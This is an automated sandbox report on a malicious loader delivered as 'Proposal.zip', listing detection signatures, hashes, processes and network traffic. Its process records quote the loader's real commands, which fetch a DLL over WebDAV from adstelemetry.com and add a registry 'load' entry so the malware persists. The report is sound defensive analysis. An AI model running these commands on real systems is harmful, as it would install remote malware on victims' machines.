File name: Proposal.zip

Full analysis: https://app.any.run/tasks/6efc9793-a0a3-42f3-8a63-b1339d03751f
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: January 10, 2025, 07:25:48
OS: Windows 10 Professional (build: 19045, 64 bit)
Tags:
webdav
reflection
loader
Indicators:
MIME: application/zip
File info: Zip archive data, at least v2.0 to extract, compression method=deflate
MD5: 535973A9DAA0F7ADC4E3248724252778
SHA1: 8F901B64FC57276C7597A95383953B57B6C56A92
SHA256: F3DA5FA264007B9680CA035357183E2C37C95CB053393700E85D53F7478925A3
SSDEEP: 12288:LOOahzz/Wbn3f0NCESjYPdYsPmZaujuhMdAqbOiQ87:LO1ZzObn3f0NCE8mdYsP+aujuhMRbOiL

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 6924)
      • powershell.exe (PID: 7048)
      • powershell.exe (PID: 7136)
    • Changes powershell execution policy (Bypass)

      • fixmapi.exe (PID: 5300)
    • Bypass execution policy to execute commands

      • powershell.exe (PID: 7048)
      • powershell.exe (PID: 7136)
    • Downloads the requested resource (POWERSHELL)

      • fixmapi.exe (PID: 5300)
    • Gets or sets the symmetric key that is used for encryption and decryption (POWERSHELL)

      • fixmapi.exe (PID: 5300)
    • Gets or sets the initialization vector for the symmetric algorithm (POWERSHELL)

      • fixmapi.exe (PID: 5300)
    • Uses AES cipher (POWERSHELL)

      • fixmapi.exe (PID: 5300)
    • Dynamically loads an assembly (POWERSHELL)

      • fixmapi.exe (PID: 5300)
  • SUSPICIOUS

    • PowerShell delay command usage (probably sleep evasion)

      • powershell.exe (PID: 6924)
    • Manipulates environment variables

      • powershell.exe (PID: 6924)
    • Possibly malicious use of IEX has been detected

      • WinRAR.exe (PID: 4204)
    • Starts POWERSHELL.EXE for commands execution

      • WinRAR.exe (PID: 4204)
      • fixmapi.exe (PID: 5300)
    • Detects reflection assembly loader (YARA)

      • powershell.exe (PID: 6924)
    • Starts NET.EXE to map network drives

      • powershell.exe (PID: 6924)
    • Process drops legitimate windows executable

      • powershell.exe (PID: 6924)
    • Executable content was dropped or overwritten

      • expand.exe (PID: 1076)
      • powershell.exe (PID: 6924)
      • svchost.exe (PID: 2084)
      • fixmapi.exe (PID: 5300)
      • csc.exe (PID: 6560)
    • Uses sleep to delay execution (POWERSHELL)

      • powershell.exe (PID: 6924)
      • fixmapi.exe (PID: 5300)
    • Uses RUNDLL32.EXE to load library

      • svchost.exe (PID: 2084)
    • Abuses WebDav for code execution

      • svchost.exe (PID: 2084)
    • The process executes via Task Scheduler

      • fixmapi.exe (PID: 5300)
    • Reads security settings of Internet Explorer

      • RegAsm.exe (PID: 2132)
      • fixmapi.exe (PID: 5300)
      • WinRAR.exe (PID: 4204)
    • Uses REG/REGEDIT.EXE to modify registry

      • powershell.exe (PID: 7136)
      • powershell.exe (PID: 7048)
      • cmd.exe (PID: 236)
    • Checks Windows Trust Settings

      • fixmapi.exe (PID: 5300)
    • Gets or sets the security protocol (POWERSHELL)

      • fixmapi.exe (PID: 5300)
    • Reads Microsoft Outlook installation path

      • fixmapi.exe (PID: 5300)
    • Reads Internet Explorer settings

      • fixmapi.exe (PID: 5300)
    • Starts a new process with hidden mode (POWERSHELL)

      • fixmapi.exe (PID: 5300)
    • Gets information about processes (POWERSHELL)

      • fixmapi.exe (PID: 5300)
    • Converts a string into array of characters (POWERSHELL)

      • fixmapi.exe (PID: 5300)
    • Checks a user's role membership (POWERSHELL)

      • fixmapi.exe (PID: 5300)
    • Starts CMD.EXE for commands execution

      • fixmapi.exe (PID: 5300)
  • INFO

    • The process uses the downloaded file

      • WinRAR.exe (PID: 4204)
      • RegAsm.exe (PID: 2132)
    • Gets data length (POWERSHELL)

      • powershell.exe (PID: 6924)
      • fixmapi.exe (PID: 5300)
    • Application launched itself

      • Acrobat.exe (PID: 4704)
      • AcroCEF.exe (PID: 6296)
      • msedge.exe (PID: 2600)
      • msedge.exe (PID: 6228)
    • Sends debugging messages

      • Acrobat.exe (PID: 5096)
    • Reads the software policy settings

      • net.exe (PID: 736)
    • The sample compiled with english language support

      • powershell.exe (PID: 6924)
      • msedge.exe (PID: 7632)
    • Manual execution by a user

      • msedge.exe (PID: 2600)
    • Checks proxy server information

      • net.exe (PID: 736)
    • Checks supported languages

      • expand.exe (PID: 1076)
      • RegAsm.exe (PID: 2132)
      • fixmapi.exe (PID: 5300)
    • Script raised an exception (POWERSHELL)

      • powershell.exe (PID: 6924)
    • Checks if a key exists in the options dictionary (POWERSHELL)

      • powershell.exe (PID: 6924)
    • Reads the computer name

      • fixmapi.exe (PID: 5300)
    • Reads the machine GUID from the registry

      • fixmapi.exe (PID: 5300)
      • csc.exe (PID: 6560)
    • Converts byte array into ASCII string (POWERSHELL)

      • fixmapi.exe (PID: 5300)
    • Uses string split method (POWERSHELL)

      • fixmapi.exe (PID: 5300)
    • Creates a byte array (POWERSHELL)

      • fixmapi.exe (PID: 5300)
    • Gets a random number, or selects objects randomly from a collection (POWERSHELL)

      • fixmapi.exe (PID: 5300)
    • Create files in a temporary directory

      • fixmapi.exe (PID: 5300)
      • csc.exe (PID: 6560)
    • Gets or sets the time when the file was last written to (POWERSHELL)

      • fixmapi.exe (PID: 5300)
    • Executable content was dropped or overwritten

      • msedge.exe (PID: 7632)
    • Uses string replace method (POWERSHELL)

      • fixmapi.exe (PID: 5300)
    • Drops encrypted VBS script (Microsoft Script Encoder)

      • powershell.exe (PID: 6924)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (100)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0001
ZipCompression: Deflated
ZipModifyDate: 2025:01:02 05:40:42
ZipCRC: 0xa28b6148
ZipCompressedSize: 328823
ZipUncompressedSize: 342511
ZipFileName: Proposal.lnk
No data.
All screenshots are available in the full report
Total processes: 249
Monitored processes: 113
Malicious processes: 4
Suspicious processes: 2


Process information

PID
CMD
Path
Indicators
Parent process
PID: 236
CMD: "C:\WINDOWS\system32\cmd.exe" /c REG ADD "HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" /v load /d C:\Windows\Tasks\fixmapi.exe /f
Path: C:\Windows\System32\cmd.exe
Parent process: fixmapi.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\bcrypt.dll
PID: 640
CMD: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=8 --mojo-platform-channel-handle=2908 --field-trial-handle=1624,i,7971632054201257314,1539017436018739815,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Parent process: AcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 736
CMD: "C:\WINDOWS\system32\net.exe" use \\adstelemetry.com@SSL@443\hBHcHa\
Path: C:\Windows\System32\net.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Net Command
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\net.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\mpr.dll
PID: 736
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --mojo-platform-channel-handle=2368 --field-trial-handle=2372,i,15791997313663073267,18122574949518341684,262144 --variations-seed-version /prefetch:2
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1044
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_xpay_wallet.mojom.EdgeXPayWalletService --lang=en-US --service-sandbox-type=utility --no-appcompat-clear --mojo-platform-channel-handle=5380 --field-trial-handle=2372,i,15791997313663073267,18122574949518341684,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1076
CMD: "C:\WINDOWS\system32\expand.exe" \\adstelemetry.com@SSL@443\hBHcHa\mapistubx64.dll c:\windows\tasks\mapistub.dll
Path: C:\Windows\System32\expand.exe
Parent process: powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
LZ Expansion Utility
Exit code:
0
Version:
5.00 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\expand.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
PID: 1220
CMD: "C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=renderer --log-severity=disable --user-agent-product="ReaderServices/23.1.20093 Chrome/105.0.0.0" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --touch-events=enabled --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=10 --mojo-platform-channel-handle=2908 --field-trial-handle=1624,i,7971632054201257314,1539017436018739815,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:1
Path: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
Parent process: AcroCEF.exe
User:
admin
Company:
Adobe Systems Incorporated
Integrity Level:
LOW
Description:
Adobe AcroCEF
Exit code:
0
Version:
23.1.20093.0
Modules
Images
c:\program files\adobe\acrobat dc\acrobat\acrocef_1\acrocef.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
PID: 1488
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --extension-process --renderer-sub-type=extension --no-appcompat-clear --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3200 --field-trial-handle=2204,i,13151857812966353076,3986580673643499751,262144 --variations-seed-version /prefetch:2
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1576
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=2208 --field-trial-handle=2372,i,15791997313663073267,18122574949518341684,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
PID: 1580
CMD: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --mojo-platform-channel-handle=5912 --field-trial-handle=2372,i,15791997313663073267,18122574949518341684,262144 --variations-seed-version /prefetch:8
Path: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Parent process: msedge.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
LOW
Description:
Microsoft Edge
Exit code:
0
Version:
122.0.2365.59
Modules
Images
c:\program files (x86)\microsoft\edge\application\msedge.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\program files (x86)\microsoft\edge\application\122.0.2365.59\msedge_elf.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events: 114 227
Read events: 113 940
Write events: 272
Delete events: 15

Modification events

(PID) Process: (4204) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 3
Value: C:\Users\admin\Desktop\preferences.zip

(PID) Process: (4204) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 2
Value: C:\Users\admin\Desktop\chromium_ext.zip

(PID) Process: (4204) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 1
Value: C:\Users\admin\Desktop\omni_23_10_2024_.zip

(PID) Process: (4204) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\ArcHistory
Operation: write
Name: 0
Value: C:\Users\admin\AppData\Local\Temp\Proposal.zip

(PID) Process: (4204) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: name
Value: 120

(PID) Process: (4204) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: size
Value: 80

(PID) Process: (4204) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: type
Value: 120

(PID) Process: (4204) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\FileList\FileColumnWidths
Operation: write
Name: mtime
Value: 100

(PID) Process: (4204) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\WinRAR\Interface
Operation: write
Name: ShowPassword
Value: 0

(PID) Process: (4204) WinRAR.exe
Key: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer
Operation: write
Name: SlowContextMenuEntries
Value: 6024B221EA3A6910A2DC08002B30309D0A010000BD0E0C47735D584D9CEDE91E22E23282770100000114020000000000C0000000000000468D0000006078A409B011A54DAFA526D86198A780390100009AD298B2EDA6DE11BA8CA68E55D895936E000000
Executable files: 47
Suspicious files: 1 310
Text files: 244
Unknown types: 2

Dropped files

PID | Process | Filename | Type
5096 | Acrobat.exe | C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SOPHIA\Acrobat\SOPHIA.json | binary
MD5: 837C1211E392A24D64C670DC10E8DA1B
SHA256: 8013AC030684B86D754BBFBAB8A9CEC20CAA4DD9C03022715FF353DC10E14031
4204 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DIb4204.27005\Proposal.lnk | binary
MD5: 81E0E395446DF8633E5C0601FF318773
SHA256: 2C60D60F2145735F5AB0E082C38D28401DB7D57CCF69970A04DD92AA0FD4A472
6924 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\SAHRCJXJWLYGK2SYTS4L.temp | binary
MD5: 3880E8C032EBC11601995C238979FDF2
SHA256: C0F39E58A3E8EC0FF8FF3F44201DE3A5D3DC39A65FF044BD149693318B53F43C
6924 | powershell.exe | C:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_4ccr0hty.dze.psm1 | text
MD5: D17FE0A3F47BE24A6453E9EF58C94641
SHA256: 96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6924 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\f0ca72e1392931db.customDestinations-ms | binary
MD5: 3880E8C032EBC11601995C238979FDF2
SHA256: C0F39E58A3E8EC0FF8FF3F44201DE3A5D3DC39A65FF044BD149693318B53F43C
5096 | Acrobat.exe | C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\SharedDataEvents | binary
MD5: 3F01031827DFDC84F0683449EF1FC31F
SHA256: EA098183C4F992818F88814EEE2DB341BEAC83F03701EFE04905C86CAAF6439D
5096 | Acrobat.exe | C:\Users\admin\AppData\Local\Temp\acrobat_sbx\acroNGLLog.txt | text
MD5: 896F6F4CDA01D416209F7A83D5076F98
SHA256: E03A6B84C323F3F965CD349A7D71280C2330A322D860B287F1B414B080741E00
4704 | Acrobat.exe | C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt23.lst | binary
MD5: 366B140BAFC863B7E366AA1E51604759
SHA256: CBC8B288DBD2C72432081CF33CEF431572A94C7FB89DBCD59973B99E3871814E
6296 | AcroCEF.exe | C:\Users\admin\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF1400ba.TMP | text
MD5: D012E5B4EB91B61F6E8AE2F8EC3C623E
SHA256: 1BDA750084F20306722008016420E1912BA608CA8EFB9C661F7E7EFCF5E89673
5096 | Acrobat.exe | C:\Users\admin\AppData\Local\Adobe\Acrobat\DC\AdobeFnt23.lst.5096 | binary
MD5: 366B140BAFC863B7E366AA1E51604759
SHA256: CBC8B288DBD2C72432081CF33CEF431572A94C7FB89DBCD59973B99E3871814E
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests: 48
TCP/UDP connections: 240
DNS requests: 209
Threats: 0

HTTP requests

PID | Process | Method | HTTP Code | IP | URL | CN | Reputation
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.16.164.49:80 | http://crl.microsoft.com/pki/crl/products/MicRooCerAut2011_2011_03_22.crl | unknown | whitelisted
7012 | svchost.exe | GET | 206 | 199.232.210.172:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/9b9f8fb4-8a65-41e4-bda3-5416858f0aeb?P1=1736952449&P2=404&P3=2&P4=Pb5Zry2XpPRn6QnJ9ZCCqf%2ba0zqgQyDggr9DqTnLn64CbSED8EdSsj7Usj3CKkeqs3H5pOsB2QK37Wk9B9gllQ%3d%3d | unknown | whitelisted
5064 | SearchApp.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAI5PUjXAkJafLQcAAsO18o%3D | unknown | whitelisted
1176 | svchost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D | unknown | whitelisted
4712 | MoUsoCoreWorker.exe | GET | 200 | 2.23.242.101:80 | http://www.microsoft.com/pkiops/crl/MicSecSerCA2011_2011-10-18.crl | unknown | whitelisted
6216 | backgroundTaskHost.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEAUZZSZEml49Gjh0j13P68w%3D | unknown | whitelisted
5340 | SIHClient.exe | GET | 200 | 95.101.149.131:80 | http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Product%20Root%20Certificate%20Authority%202018.crl | unknown | whitelisted
4704 | Acrobat.exe | GET | 200 | 192.229.221.95:80 | http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAbY2QTVWENG9oovp1QifsQ%3D | unknown | whitelisted
7012 | svchost.exe | GET | 206 | 199.232.210.172:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/9b9f8fb4-8a65-41e4-bda3-5416858f0aeb?P1=1736952449&P2=404&P3=2&P4=Pb5Zry2XpPRn6QnJ9ZCCqf%2ba0zqgQyDggr9DqTnLn64CbSED8EdSsj7Usj3CKkeqs3H5pOsB2QK37Wk9B9gllQ%3d%3d | unknown | whitelisted
7012 | svchost.exe | HEAD | 200 | 199.232.210.172:80 | http://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/d50ccf3e-dd06-4e6f-bb20-931c8ce33527?P1=1736952451&P2=404&P3=2&P4=YHQTlmt7pKGZIvLzG2a0n4mj7Wr5t6f6GdwQ2Y0OkZNO1nQAguJc59TGP6dyiHN7CSkMHqW7lW8Ib4sLD4EfdQ%3d%3d | unknown | whitelisted

Connections

PID | Process | IP | Domain | ASN | CN | Reputation
4 | System | 192.168.100.255:137 | - | - | - | whitelisted
1488 | svchost.exe | 4.231.128.59:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
- | - | 4.231.128.59:443 | - | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
4712 | MoUsoCoreWorker.exe | 2.16.164.49:80 | crl.microsoft.com | Akamai International B.V. | NL | whitelisted
4712 | MoUsoCoreWorker.exe | 2.23.242.101:80 | www.microsoft.com | Ooredoo Q.S.C. | QA | whitelisted
4 | System | 192.168.100.255:138 | - | - | - | whitelisted
5064 | SearchApp.exe | 2.23.227.221:443 | www.bing.com | Ooredoo Q.S.C. | QA | whitelisted
5064 | SearchApp.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted
1176 | svchost.exe | 20.190.159.75:443 | login.live.com | MICROSOFT-CORP-MSN-AS-BLOCK | IE | whitelisted
1176 | svchost.exe | 192.229.221.95:80 | ocsp.digicert.com | EDGECAST | US | whitelisted

DNS requests

Domain
IP
Reputation
crl.microsoft.com
  • 2.16.164.49
  • 2.16.164.72
whitelisted
www.microsoft.com
  • 2.23.242.101
  • 95.101.149.131
whitelisted
google.com
  • 172.217.16.142
whitelisted
www.bing.com
  • 2.23.227.221
  • 2.23.227.208
  • 2.23.227.202
  • 2.23.227.215
  • 104.126.37.137
  • 104.126.37.178
  • 104.126.37.131
  • 104.126.37.185
  • 104.126.37.139
  • 104.126.37.123
  • 104.126.37.144
  • 104.126.37.145
  • 104.126.37.128
  • 104.126.37.163
  • 104.126.37.155
  • 104.126.37.176
  • 104.126.37.170
  • 104.126.37.186
  • 104.126.37.171
whitelisted
ocsp.digicert.com
  • 192.229.221.95
whitelisted
login.live.com
  • 20.190.159.75
  • 20.190.159.68
  • 20.190.159.0
  • 20.190.159.64
  • 20.190.159.4
  • 40.126.31.67
  • 20.190.159.73
  • 40.126.31.71
whitelisted
go.microsoft.com
  • 2.23.242.9
whitelisted
settings-win.data.microsoft.com
  • 20.73.194.208
whitelisted
arc.msn.com
  • 20.199.58.43
  • 20.223.36.55
whitelisted
fd.api.iris.microsoft.com
  • 20.223.35.26
whitelisted

Threats

No threats detected
No debug info